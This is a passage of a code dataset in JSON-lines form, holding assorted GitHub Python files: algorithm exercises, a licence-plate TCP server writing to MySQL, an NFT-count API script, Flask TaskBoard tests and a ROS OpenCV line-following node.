\"\"\"Creates a Wall\n\n Args:\n x0 (List): Initial point of wall\n xf (List): End point of wall\n \"\"\"\n LinealCollider.__init__(self, x0, xf)\n self.color = 'blue'\n\n def callback(self, object: 'Node') -> None:\n \"\"\"Wall callback on collision detection\n\n Args:\n object (Node): Node which collides\n \"\"\"\n d, dx = p2l(object.U, self.X0, self.XF)\n if d <= object.r:\n object.V -= 2*np.dot(object.V, dx)*dx/d/d*.95\n object.U += dx/d*(d-object.r)\n","repo_name":"ZibraMax/mass-body","sub_path":"pe/Colliders.py","file_name":"Colliders.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} {"seq_id":"40743423857","text":"import sys\nsys.stdin = open('5102.txt', 'r')\n\ndef func(queue):\n\tglobal front, rear\n\tcount = 0\n\twhile front != rear:\n\t\tfront += 1\n\t\tx = queue[front]\n\t\tcount += 1\n\t\tfor i in range(V + 1):\n\t\t\tif matrix[x][i] == 1:\n\t\t\t\tqueue.append(i)\n\t\t\t\trear += 1\n\t\t\t\tmatrix[x][i] = 0\n\t\t\t\tif i == G:\n\t\t\t\t\treturn count\n\treturn 0\n\n\nT = int(input())\nfor tc in range(1, T+1):\n\tV, E = map(int, input().split())\n\tnode = [tuple(map(int, input().split())) for _ in range(E)]\n\tS, G = map(int, input().split()) # 출발, 도착지점\n\n\tmatrix = [[0]*(V+1) for _ in range(V+1)]\n\n\tfor n in node:\n\t\tmatrix[n[0]][n[1]] = 1\n\t\tmatrix[n[1]][n[0]] = 1\n\n\tfront = rear = -1\n\tqueue = []\n\n\tfor m in range(len(matrix)):\n\t\tif matrix[S][m] == 1:\n\t\t\tqueue.append(m)\n\t\t\trear += 1\n\t\t\tmatrix[S][m] = 0\n\n\tans = func(queue)\n\n\tprint('#%d %d' % (tc, ans))","repo_name":"soulgchoi/Algorithm","sub_path":"SWEA/5102 [SW 문제해결 기본] 노드의 거리.py","file_name":"5102 [SW 문제해결 기본] 노드의 
거리.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"29918594857","text":"\nclass ones_threes_nines:\n \n def __init__(self,n):\n d={9:0,3:0,1:0}\n for i in [9,3,1]:\n while n>=i:\n d[i]+=1\n n-=i\n self.answer = 'nines:{d[9]}, threes:{d[3]}, ones:{d[1]}'.format(d=d)\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"8Fwv2f8My4kcNjMZh_4.py","file_name":"8Fwv2f8My4kcNjMZh_4.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40849711319","text":"import socketserver\r\nimport datetime\r\nimport base64\r\nimport numpy as np\r\nimport cv2\r\nimport imutils\r\nimport mysql.connector\r\nfrom mysql.connector import Error\r\nimport Main\r\nimport mysql.connector\r\nfrom mysql.connector import Error\r\n\r\ndef insertVariblesIntoTable(PlateNumber):\r\n try:\r\n connection=mysql.connector.connect(host='localhost',user='root',db='test')\r\n cursor=connection.cursor()\r\n SQL_insert_thing=\"INSERT INTO demotable665(PlateNumber)VALUES (%(carno)s)\"\r\n CarPlate={'carno':PlateNumber}\r\n print(CarPlate)\r\n cursor.execute(SQL_insert_thing,CarPlate)\r\n connection.commit()\r\n print(\"Thing inserted inside nicely\")\r\n\r\n except mysql.connector.Error as error:\r\n print(\"Failed to insert \".format(error))\r\n\r\n finally:\r\n if(connection.is_connected()):\r\n cursor.close()\r\n connection.close()\r\n print(\"Mysql connection is closed\")\r\n\r\nclass MyTCPHandler(socketserver.BaseRequestHandler):\r\n\r\n def handle(self):\r\n print(\"get....\")\r\n image1 = []\r\n try:\r\n while True:\r\n data=self.request.recv(5120) #拿到客戶端發送的數據 \r\n #print('data,',data)#照片=data\r\n # data = base64.b64decode(data)\r\n if not data or len(data) == 0:\r\n break\r\n image1.extend(data)\r\n \r\n \r\n image = np.asarray(bytearray(image1), dtype=\"uint8\")#映像陣列\r\n image = cv2.imdecode(image, cv2.IMREAD_COLOR)\r\n Image = imutils.resize(image,width=400,height=400)\r\n #Main.main(Image)###############throw my image inside py\r\n plateNumber=Main.main(Image)\r\n print(\"Platenumber send=\"+plateNumber)\r\n ######################\r\n insertVariblesIntoTable(plateNumber)#insert into mysql\r\n ######################\r\n self.request.sendall(plateNumber)##send car plate to client edit text##cant send\r\n print(\"I send it\")\r\n ################################################\r\n except Exception:\r\n print(self.client_address,\"連接斷開\")\r\n finally:\r\n self.request.close() #異常之後,關閉連接\r\n\r\n #before handle,連接建立:\r\n def setup(self):\r\n now_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n print(now_time)\r\n print(\"連接建立:\",self.client_address)\r\n\r\n # finish run after handle\r\n def finish(self):\r\n print(\"釋放連接\")\r\n\r\n\r\nif __name__==\"__main__\":\r\n HOST,PORT = \"\",8004\r\n # server=socketserver.TCPServer((HOST,PORT),MyTCPHandler) #實例對象,傳入參數\r\n\r\n # 多線程\r\n server = socketserver.ThreadingTCPServer((HOST, PORT), MyTCPHandler)\r\n server.serve_forever() #一直運行\r\n\r\n\r\n","repo_name":"sadkala/FYP","sub_path":"TESTFY/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"20819274519","text":"\"\"\"\n13. 
完善控制台五子棋程序。\n\"\"\"\n# 定义棋盘的大小\nBOARD_SIZE = 15\n# 定义一个 维列表来充当棋盘\nboard = []\n\n\ndef init_board():\n # 为每个元素赋值”+\n for i in range(BOARD_SIZE):\n row = ['+'] * BOARD_SIZE\n board.append(row)\n\n\n# 在控制台输出棋盘的方法\ndef print_board():\n # 打印每个列表元素\n for i in range(BOARD_SIZE):\n for j in range(BOARD_SIZE):\n # 打印列表元素后不换行\n print (board[i][j], end='')\n # 每打印完一行列表元素后输出 个换行符\n print()\n\n\ninit_board()\nprint_board()\ninputStr = input('请输入您下棋的坐标,应以 x,y 的格式')\nwhile inputStr is not None:\n # 将用户输入的字符串以逗号( )作为分|满符,分隔成两个字符串\n x_str, y_str = inputStr.split(',')\n # 为对应的列表元素赋值”·\n board[int(y_str) - 1][int(x_str) - 1] = '·'\n\n '''\n 电脑随机生成两个整数,作为电脑下棋的坐标 赋{直给 board 列表\n 还涉及\n 1. 坐标的有效性,只能是数字,不能超出棋盘范围\n 2.下的棋的点,不能重复下棋\n 3. 每次下棋后,需要扫描谁赢了\n '''\n print_board()\n inputStr = input('请输入您下棋的坐标,应以x,y的格式:\\n')\n","repo_name":"Carlzkh/CrazyPythonNotes","sub_path":"exercise/four/4.13.py","file_name":"4.13.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33570261880","text":"n = int(input())\r\n\r\nstack = []\r\nans = []\r\ncur = 1\r\n\r\nfor _ in range(n):\r\n num = int(input())\r\n\r\n while cur <= num:\r\n stack.append(cur)\r\n ans.append(\"+\")\r\n cur += 1\r\n if stack[-1] == num:\r\n ans.append(\"-\")\r\n stack.pop()\r\n else:\r\n print(\"NO\")\r\n break\r\n\r\nelse:\r\n for x in ans:\r\n print(x)","repo_name":"dongjun-Yi/Algorithm","sub_path":"백준/Silver/1874. 스택 수열/스택 수열.py","file_name":"스택 수열.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15110812071","text":"import requests\r\n\r\napi = 'Your_oklink_api_key'\r\n\r\nheaders = {'Ok-Access-Key': api}\r\n\r\n\r\ndef read_file(filename):\r\n result = []\r\n with open(filename, 'r') as file:\r\n for tmp in file.readlines():\r\n result.append(tmp.replace('\\n', ''))\r\n\r\n return result\r\n\r\n\r\ndef write_to_file(filename, text):\r\n with open(filename, 'a') as file:\r\n file.write(f'{text}\\n')\r\n\r\n\r\ndef total_count_of_w3st(page, address):\r\n tw = 0\r\n params = {\r\n 'chainShortName': 'BSC',\r\n 'address': address,\r\n 'protocolType': 'token_721',\r\n 'limit': '50',\r\n 'page': page\r\n }\r\n\r\n data = requests.get(\r\n 'https://www.oklink.com/api/v5/explorer/address/address-balance-fills',\r\n params=params,\r\n headers=headers,\r\n ).json()['data'][0]\r\n\r\n total_pages = int(data['totalPage'])\r\n tokenList = data['tokenList']\r\n\r\n for token in tokenList:\r\n if token['token'] == 'WΞST':\r\n tw += 1\r\n\r\n return total_pages, tw\r\n\r\n\r\nfor address in read_file('addresses.txt'):\r\n total_w3sts = 0\r\n total_pages, tw = total_count_of_w3st(1, address)\r\n total_w3sts += tw\r\n\r\n for i in range(2, total_pages+1):\r\n total_pages, tw = total_count_of_w3st(i, address)\r\n total_w3sts += tw\r\n print(f'{address};{total_w3sts}')\r\n write_to_file('Result.txt', f'{address};{total_w3sts}')","repo_name":"viter0layer/W3ST-Parser","sub_path":"W3ST_Parser.py","file_name":"W3ST_Parser.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43485206449","text":"from flask import url_for\nfrom flask_login import current_user\nfrom TaskBoard.tests.base import BaseTestCase\nfrom TaskBoard.fakes import *\n\n\nclass BoardTestCase(BaseTestCase):\n def setUp(self) -> None:\n super(BoardTestCase, self).setUp()\n self.login()\n\n def 
test_index(self):\n response = self.client.get(url_for('taskboard.index'))\n data = response.get_data(as_text=True)\n self.assertIn('TaskBoard-LumiaO', data)\n self.assertIn('Boards', data)\n self.assertIn('Setting', data)\n self.assertIn('Logout', data)\n self.assertIn('Project Tree', data)\n self.assertIn('Milestone Column', data)\n self.assertIn('Task Column', data)\n\n def test_none_project(self):\n response = self.client.get(url_for('taskboard.none_project'))\n data = response.get_data(as_text=True)\n self.assertIn('There is not exist any project. ', data)\n\n def test_render_milestone_column(self):\n fake_Projects(1)\n fake_milestones(1)\n project = Project.query.get(1)\n project_id = project.id\n data = dict(project_id=project_id)\n with self.client:\n url = url_for('taskboard.render_milestone_column')\n response_data = self.post_data(url, data=dict(project_id='None'))\n self.assertIn('There is no default project', response_data)\n response_data = self.post_data(url, data=data)\n self.assertNotIn('There is no default project', response_data)\n\n def test_render_task_column(self):\n fake_Projects(1)\n fake_Tags(1)\n fake_Users(1)\n fake_milestones(1)\n fake_categories(1)\n fake_tasks(1)\n task = Task.query.get(1)\n task_id = task.id\n data = dict(task_id=task_id)\n with self.client:\n url = url_for('taskboard.render_task_column')\n response_data = self.post_data(url, data=None)\n self.assertNotIn('Description', response_data)\n self.assertNotIn('Add Attachment', response_data)\n self.assertNotIn('Add Comment', response_data)\n response_data = self.post_data(url, data=data)\n self.assertIn('Description', response_data)\n self.assertIn('Add Attachment', response_data)\n self.assertIn('Add Comment', response_data)\n\n def test_save_task_edit_modal(self):\n fake_Projects(1)\n fake_Tags(1)\n fake_Users(1)\n fake_milestones(1)\n fake_categories(1)\n fake_tasks(1)\n action_type_edit = 'edit'\n action_type_add = 'add'\n task_id = 1\n task_name = 'newTaskNameTest'\n task_description = 'emmmmmmmmmmmmmmm'\n assigned_user_id = 1\n category_id = 1\n milestone_id = 1\n color_text = '#888888'\n date_picker_text = '2019-10-24'\n points = '6'\n\n json_data = {\n 'action_type': action_type_edit,\n 'task_id': task_id,\n 'task_name': task_name,\n 'task_description': task_description,\n 'assigned_user_id': assigned_user_id,\n 'category_id': category_id,\n 'milestone_id': milestone_id,\n 'color_text': color_text,\n 'date_picker_text': date_picker_text,\n 'points': points\n }\n url = url_for('taskboard.save_task_edit_modal')\n with self.client:\n response = self.client.post(url, json=json_data)\n response_data = response.get_data(as_text=True)\n self.assertIn('edit-' + str(task_id), response_data)\n task = Task.query.get(task_id)\n self.assertEqual(task_name.title(), task.title)\n self.assertEqual(task_description, task.description)\n self.assertEqual(assigned_user_id, task.user_id)\n self.assertEqual(category_id, task.category_id)\n self.assertEqual(milestone_id, task.milestone_id)\n self.assertEqual(color_text, task.color)\n self.assertEqual(date_picker_text, task.due_date.strftime('%Y-%m-%d'))\n self.assertEqual(points, str(task.points))\n json_data['action_type'] = action_type_add\n response = self.client.post(url, json=json_data)\n response_data = response.get_data(as_text=True)\n task_id = response_data.split('-')[1]\n self.assertIn('add-' + str(task_id), response_data)\n task = Task.query.get(task_id)\n self.assertEqual(task_name.title(), task.title)\n self.assertEqual(task_description, 
task.description)\n self.assertEqual(assigned_user_id, task.user_id)\n self.assertEqual(category_id, task.category_id)\n self.assertEqual(milestone_id, task.milestone_id)\n self.assertEqual(color_text, task.color)\n self.assertEqual(date_picker_text, task.due_date.strftime('%Y-%m-%d'))\n self.assertEqual(points, str(task.points))\n\n def test_add_milestone_node(self):\n project_id = 1\n milestone_name = 'NewMilestoneName'\n with self.client:\n url = url_for('taskboard.add_milestone_node')\n response_data = self.post_data(url, data=dict(parent_id='None'))\n self.assertIn('fail', response_data)\n response_data = self.post_data(url, data=dict(parent_id=project_id, new_name=milestone_name))\n self.assertIn('ok', response_data)\n milestone = Milestone.query.filter_by(title=milestone_name.title()).first()\n self.assertEqual(milestone_name.title(), milestone.title)\n self.assertEqual(project_id, milestone.project_id)\n\n def test_rename_node(self):\n fake_Projects(1)\n fake_Tags(1)\n fake_Users(1)\n fake_milestones(1)\n fake_categories(1)\n fake_tasks(1)\n node_type = 'None'\n node_id = 1\n new_name = 'NewNameTest'.title()\n data = dict(type=node_type, id=node_id, new_name=new_name)\n with self.client:\n url = url_for('taskboard.rename_node')\n response_data = self.post_data(url, data=data)\n self.assertIn('None', response_data)\n data['type'] = 'task'\n response_data = self.post_data(url, data=data)\n self.assertIn('ok', response_data)\n task = Task.query.get(node_id)\n self.assertEqual(new_name, task.title)\n data['type'] = 'milestone'\n response_data = self.post_data(url, data=data)\n self.assertIn('ok', response_data)\n milestone = Milestone.query.get(node_id)\n self.assertEqual(new_name, milestone.title)\n data['type'] = 'project'\n response_data = self.post_data(url, data=data)\n self.assertIn('ok', response_data)\n project = Project.query.get(node_id)\n self.assertEqual(new_name, project.title)\n\n def test_copy_node(self):\n fake_Projects(1)\n fake_Tags(1)\n fake_Users(1)\n fake_milestones(1)\n fake_categories(1)\n fake_tasks(1)\n node_type = 'None'\n node_id = 1\n new_name = 'NewNameTest'.title()\n target_id = 1\n data = dict(type=node_type, id=node_id, new_name=new_name, target_id=target_id)\n with self.client:\n url = url_for('taskboard.copy_node')\n response_data = self.post_data(url, data=data)\n self.assertIn('None', response_data)\n data['type'] = 'task'\n response_data = self.post_data(url, data=data)\n self.assertIn('ok', response_data)\n task = Task.query.get(node_id)\n new_task = Task.query.filter_by(title=new_name).first()\n self.assertEqual(new_task.title, new_name)\n self.assertEqual(new_task.description, task.description)\n self.assertEqual(new_task.color, task.color)\n self.assertEqual(new_task.due_date, task.due_date)\n self.assertEqual(new_task.points, task.points)\n self.assertEqual(new_task.milestone_id, target_id)\n self.assertEqual(new_task.category_id, task.category_id)\n self.assertEqual(new_task.user_id, task.user_id)\n data['type'] = 'milestone'\n response_data = self.post_data(url, data=data)\n self.assertIn('ok', response_data)\n new_milestone = Milestone.query.filter_by(title=new_name).first()\n self.assertEqual(new_milestone.title, new_name)\n self.assertEqual(new_milestone.project_id, target_id)\n\n def test_move_node(self):\n fake_Projects(1)\n fake_Tags(1)\n fake_Users(1)\n fake_milestones(1)\n fake_categories(1)\n fake_tasks(1)\n node_type = 'None'\n node_id = 1\n target_id = 1\n data = dict(type=node_type, id=node_id, target_id=target_id)\n with 
self.client:\n url = url_for('taskboard.move_node')\n response_data = self.post_data(url, data=data)\n self.assertIn('None', response_data)\n data['type'] = 'task'\n response_data = self.post_data(url, data=data)\n self.assertIn('ok', response_data)\n task = Task.query.get(node_id)\n self.assertEqual(task.milestone_id, target_id)\n data['type'] = 'milestone'\n response_data = self.post_data(url, data=data)\n self.assertIn('ok', response_data)\n milestone = Milestone.query.get(node_id)\n self.assertEqual(milestone.project_id, target_id)\n\n def test_delete_node(self):\n fake_Projects(1)\n fake_Tags(1)\n fake_Users(1)\n fake_milestones(1)\n fake_categories(1)\n fake_tasks(1)\n node_type = 'None'\n node_id = 1\n data = dict(type=node_type, id=node_id)\n with self.client:\n url = url_for('taskboard.delete_node')\n response_data = self.post_data(url, data=data)\n self.assertIn('None', response_data)\n data['type'] = 'task'\n response_data = self.post_data(url, data=data)\n self.assertIn('ok', response_data)\n self.assertEqual(Task.query.get(node_id), None)\n data['type'] = 'milestone'\n response_data = self.post_data(url, data=data)\n self.assertIn('ok', response_data)\n self.assertEqual(Milestone.query.get(node_id), None)\n data['type'] = 'project'\n response_data = self.post_data(url, data=data)\n self.assertIn('ok', response_data)\n self.assertEqual(Project.query.get(node_id), None)\n\n def test_task_attachment_upload(self):\n pass\n\n def test_download_task_attachment(self):\n pass\n\n def test_delete_task_attachment(self):\n pass\n\n def test_edit_or_add_comment(self):\n fake_Projects(1)\n fake_Tags(1)\n fake_Users(1)\n fake_milestones(1)\n fake_categories(1)\n fake_tasks(1)\n fake_comments(1)\n action = 'None'\n text = 'balabalabalabalabalabala'\n task_id = 1\n data = dict(action=action, text=text, task_id=task_id)\n with self.client:\n url = url_for('taskboard.edit_or_add_comment')\n response_data = self.post_data(url, data=data)\n self.assertIn('fail', response_data)\n data['action'] = 'add'\n response_data = self.post_data(url, data=data)\n self.assertIn('add', response_data)\n comment = Comment.query.filter_by(text=text).first()\n self.assertEqual(comment.user_id, current_user.id)\n self.assertEqual(comment.task_id, task_id)\n data['action'] = 'edit'\n data['comment_id'] = 1\n response_data = self.post_data(url, data=data)\n self.assertIn('edit', response_data)\n comment = Comment.query.get(1)\n self.assertEqual(comment.user_id, current_user.id)\n self.assertEqual(comment.task_id, task_id)\n self.assertEqual(comment.text, text)\n\n def test_delete_comment_by_id(self):\n fake_Projects(1)\n fake_Tags(1)\n fake_Users(1)\n fake_milestones(1)\n fake_categories(1)\n fake_tasks(1)\n fake_comments(1)\n comment_id = 1\n with self.client:\n url = url_for('taskboard.delete_comment_by_id')\n response_data = self.post_data(url, data=None)\n self.assertIn('None', response_data)\n response_data = self.post_data(url, data=dict(comment_id=comment_id))\n self.assertIn('ok', response_data)\n self.assertEqual(None, Comment.query.get(comment_id))\n\n def test_tree_json(self):\n pass\n","repo_name":"LumiaO-N9/TaskBoard","sub_path":"TaskBoard/tests/test_board.py","file_name":"test_board.py","file_ext":"py","file_size_in_byte":12720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6012043091","text":"#!/usr/bin/env python\nimport rospy\nimport time\nfrom sensor_msgs.msg import Image\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import 
CompressedImage\nimport cv2, cv_bridge, numpy\nimport math\nfrom cv_bridge import CvBridge, CvBridgeError\nimport atexit\n\nclass OpenCVLineDetector:\n\n def __init__(self):\n self.bridge = cv_bridge.CvBridge()\n #cv2.namedWindow(\"window\", 1)\n self.image_sub = rospy.Subscriber(\"/raspicam_node/image/compressed\", CompressedImage, self.callback, queue_size=1)\n self.pub = rospy.Publisher('/cmd_vel', Twist, queue_size=1)\n self.imageOut = rospy.Publisher('/line/image_raw', Image, queue_size=1)\n self.cmd = Twist()\n # P=0.4\n # I=0.002\n # D=0.03\n P=0.8\n I=0.0\n D=0 #0.1\n self.pid = PID(P, I, D)\n self.pid.SetPoint = 0.0\n P=0.005\n I=0.001\n D=0 #0.0015\n self.pidStrafe = PID(P, I, D)\n self.pidStrafe.SetPoint = 0.0\n atexit.register(self.cleanup)\n\n def cleanup(self):\n #Stop the robot\n self.pub.publish(Twist())\n\n def bottom(self, hsv, mask):\n #limit search to bottom of image\n h, w, d = hsv.shape\n search_top = 5*h/6\n search_bot = h\n mask[0:search_top, 0:w] = 0\n mask[search_bot:h, 0:w] = 0\n # edge = w/4\n # mask[0:h, 0:edge] = 0\n # mask[0:h, w-edge:w] = 0\n #find center of mask\n M = cv2.moments(mask)\n if M['m00'] > 0:\n cx = int(M['m10']/M['m00'])\n cy = int(M['m01']/M['m00'])\n err = cx - w/2\n return cx, cy, err\n\n #Safest to report center\n return -1, -1, -1\n\n def top(self, hsv, mask):\n #limit search to bottom of image\n h, w, d = hsv.shape\n search_top = 1*h/4\n search_bot = 3*h/4\n mask[0:search_top, 0:w] = 0\n mask[search_bot:h, 0:w] = 0\n #find center of mask\n M = cv2.moments(mask)\n if M['m00'] > 0:\n cx = int(M['m10']/M['m00'])\n cy = int(M['m01']/M['m00'])\n err = cx - w/2\n return cx, cy, err\n #Return error\n return -1, -1, -1\n\n def callback(self, msg):\n try:\n #### direct conversion to CV2 ####\n np_arr = numpy.fromstring(msg.data, numpy.uint8)\n cv_image = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)\n #cv_image = self.bridge.imgmsg_to_cv2(msg, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n return\n\n #convert to hsv\n hsv = cv2.cvtColor(cv_image, cv2.COLOR_BGR2HSV)\n\n #filter out black\n lower = numpy.array([0,190,0])\n upper = numpy.array([180, 255, 90])\n mask = cv2.inRange(hsv, lower, upper)\n h, w, d = hsv.shape\n # mask[0:h, 0:0] = 0\n # mask[0:h, w-0:w] = 0\n #Create output image for displaying data to user\n output = cv2.bitwise_and(cv_image, cv_image, mask=mask)\n output = cv2.bitwise_not(output)\n #Find center line of Top and Botton\n #cxT, cyT, errT = self.top(hsv, mask.copy())\n width, cxT, cyT, contour = self.contours(mask.copy(), output)\n cxB, cyB, errB = self.bottom(hsv, mask.copy())\n #Display results\n cv2.circle(output, (cxT, cyT), 10, (255,0,0), -1)\n cv2.circle(output, (cxB, cyB), 10, (0,0,255), -1)\n cv2.imshow(\"window\", numpy.hstack([hsv,output]))\n cv2.waitKey(1)\n #Check for error state\n if cxT == -1 or cxB == -1:\n self.cmd.angular.z = 0\n self.cmd.linear.y = 0\n self.cmd.linear.x = 0\n if cxT > -1:\n self.cmd.linear.x = 0.05\n if cxB > -1:\n if cxB > w/2:\n self.cmd.linear.y = 0.05\n else:\n self.cmd.linear.y = -0.05\n self.pub.publish(self.cmd)\n return\n\n slope = numpy.arctan2(cyT - cyB, cxT - cxB)\n\n #Turn so the line is vertical, slope == -PI/2\n slopeErr = -math.pi/2 - slope\n #Send command to robot\n self.setCommand(zError = slopeErr, yError = errB, width = width)\n self.pub.publish(self.cmd)\n\n #imageToPub = self.bridge.cv2_to_compressed_imgmsg(numpy.array(output))\n imageToPub = self.bridge.cv2_to_imgmsg(output, encoding=\"bgr8\")\n self.imageOut.publish(imageToPub)\n\n def setCommand(self, zError, yError, 
width):\n        #Update PID\n        self.pid.update( feedback_value = -zError )\n        self.pidStrafe.update( feedback_value = -yError )\n        #Update command\n        if width > 110:\n            self.cmd.linear.x = 0.1\n            self.cmd.angular.z = 0\n            self.cmd.linear.y = 0\n        else:\n            self.cmd.linear.y = self.pidStrafe.output\n            if abs(self.pidStrafe.output) > 0.1:\n                self.cmd.linear.x = 0.0\n                self.cmd.angular.z = 0.0\n            else:\n                self.cmd.linear.x = 0.2\n                self.cmd.angular.z = self.pid.output\n\n\n    def contours(self, mask, output):\n        h, w, d = output.shape\n        search_top = 3*h/6\n        search_bot = 4*h/6\n        mask[0:search_top, 0:w] = 0\n        mask[search_bot:h, 0:w] = 0\n        ret, thresh = cv2.threshold(mask, 127, 255, 0)\n        im2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n        if len(contours) != 0:\n            # draw in blue the contours that were found\n            cv2.drawContours(output, contours, -1, 255, 3)\n\n            # find the biggest area\n            c = max(contours, key=cv2.contourArea)\n\n            x, y, w, h = cv2.boundingRect(c)\n            # draw the largest contour (in green)\n            cv2.rectangle(output, (x, y), (x + w, y + h), (0, 255, 0), 2)\n            cv2.drawContours(output, c, -1, (0, 255, 0), 3)\n            M = cv2.moments(c)\n            if M['m00'] > 0:\n                cx = int(M['m10'] / M['m00'])\n                cy = int(M['m01'] / M['m00'])\n                cv2.circle(output, (cx, cy), 15, (0, 255, 0), -1)\n            return w, cx, cy, c\n        #Return error\n        return -1, -1, -1, None\n\nclass PID:\n    \"\"\"PID Controller\n    \"\"\"\n\n    def __init__(self, P=0.2, I=0.0, D=0.0):\n\n        self.Kp = P\n        self.Ki = I\n        self.Kd = D\n\n        self.sample_time = 0.00\n        self.current_time = time.time()\n        self.last_time = self.current_time\n\n        self.clear()\n\n    def clear(self):\n        \"\"\"Clears PID computations and coefficients\"\"\"\n        self.SetPoint = 0.0\n\n        self.PTerm = 0.0\n        self.ITerm = 0.0\n        self.DTerm = 0.0\n        self.last_error = 0.0\n\n        # Windup Guard\n        self.int_error = 0.0\n        self.windup_guard = 20.0\n\n        self.output = 0.0\n\n    def update(self, feedback_value):\n        \"\"\"Calculates PID value for given reference feedback\n\n        .. math::\n            u(t) = K_p e(t) + K_i \\\int_{0}^{t} e(t)dt + K_d {de}/{dt}\n\n        .. 
figure:: images/pid_1.png\n            :align: center\n\n           Test PID with Kp=1.2, Ki=1, Kd=0.001 (test_pid.py)\n\n        \"\"\"\n        error = self.SetPoint - feedback_value\n\n        self.current_time = time.time()\n        delta_time = self.current_time - self.last_time\n        delta_error = error - self.last_error\n\n        if (delta_time >= self.sample_time):\n            self.PTerm = self.Kp * error\n            self.ITerm += error * delta_time\n\n            if (self.ITerm < -self.windup_guard):\n                self.ITerm = -self.windup_guard\n            elif (self.ITerm > self.windup_guard):\n                self.ITerm = self.windup_guard\n\n            self.DTerm = 0.0\n            if delta_time > 0:\n                self.DTerm = delta_error / delta_time\n\n            # Remember last time and last error for next calculation\n            self.last_time = self.current_time\n            self.last_error = error\n\n            self.output = self.PTerm + (self.Ki * self.ITerm) + (self.Kd * self.DTerm)\n\n    def setKp(self, proportional_gain):\n        \"\"\"Determines how aggressively the PID reacts to the current error with setting Proportional Gain\"\"\"\n        self.Kp = proportional_gain\n\n    def setKi(self, integral_gain):\n        \"\"\"Determines how aggressively the PID reacts to the current error with setting Integral Gain\"\"\"\n        self.Ki = integral_gain\n\n    def setKd(self, derivative_gain):\n        \"\"\"Determines how aggressively the PID reacts to the current error with setting Derivative Gain\"\"\"\n        self.Kd = derivative_gain\n\n    def setWindup(self, windup):\n        \"\"\"Integral windup, also known as integrator windup or reset windup,\n        refers to the situation in a PID feedback controller where\n        a large change in setpoint occurs (say a positive change)\n        and the integral term accumulates a significant error\n        during the rise (windup), thus overshooting and continuing\n        to increase as this accumulated error is unwound\n        (offset by errors in the other direction).\n        The specific problem is the excess overshooting.\n        \"\"\"\n        self.windup_guard = windup\n\n    def setSampleTime(self, sample_time):\n        \"\"\"The PID should be updated at a regular interval.\n        Based on a pre-determined sample time, the PID decides if it should compute or return immediately.\n        \"\"\"\n        self.sample_time = sample_time\n\ndef listener():\n    rospy.init_node('opencv_line_detector', anonymous=False)\n    openCVLineDetector = OpenCVLineDetector()\n    try:\n        rospy.spin()\n    except KeyboardInterrupt:\n        print(\"Shutting down\")\n        cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n    listener()\n","repo_name":"frankjoshua/gobbit","sub_path":"docker_ros_nodes/ros-thermal-dnn/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":9668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40051362274","text":"import csv\nfrom os import listdir\nfrom os.path import isfile, join, dirname, realpath\n\n# directory relative to the repository root where the image files are located\nrootFolder = 'dataset'\n\n# get full path of where to find files for the dataset\ndatasetPath = join(dirname(realpath(__file__)), '../', rootFolder)\nprint(\"Dataset Path {}\".format(datasetPath))\n\n# get all the file names\ndatasetFiles = [f for f in listdir(datasetPath) if isfile(join(datasetPath, f))]\n\n# write to csv\nwith open('character_description.csv', mode='w') as descFile:\n    descriptionWriter = csv.writer(descFile, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\n    for fileName in datasetFiles:\n        rootRelativePath = join(rootFolder, fileName) # ie: dataset/A-123-2.jpeg\n        classification = fileName[0] # first character in image name == classification\n\n        # column 0 = filepath relative to repo 
root. column 1 = classification for that file\n        descriptionWriter.writerow([rootRelativePath, classification])\n","repo_name":"len0rd/uav-character-classification","sub_path":"scripts/generate_dataset_csv.py","file_name":"generate_dataset_csv.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19153518920","text":"import argparse\nimport fileinput\nimport importlib\nimport logging\nimport os\nimport subprocess\nimport sys\n\nspec = importlib.util.spec_from_file_location(\"_common\",\n                                              os.path.join(os.path.dirname(os.path.abspath(__file__)), \"./_common.py\"))\nc = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(c)\n\n\ndef add_arg_parser(parser):\n    parser.add_argument('-d', '--debug', action='store_true',\n                        help='Set log level to Debug')\n    parser.add_argument('-np', '--no_pyinstaller', action='store_true',\n                        help='Don\\'t install pyinstaller')\n    parser.add_argument('--cpu', action='store_true',\n                        help='No cuda support')\n    parser.add_argument('-pnc', '--pip_no_cache_dir', action='store_true',\n                        help='Use --no-cache-dir for pip commands')\n    parser.add_argument('-pu', '--pip_user', action='store_true',\n                        help='Use --user for pip commands')\n\n\ndef check_dependencies():\n    c.log.debug(\"OS : {}\".format(c.get_os()))\n    c.log.debug(\"Python version : {}\".format(c.get_python_version()))\n\n    if c.get_os() == c.OS.UNKNOWN:\n        c.log.fatal(\"Unknown OS !\")\n        exit(1)\n\n    if c.get_python_version() < 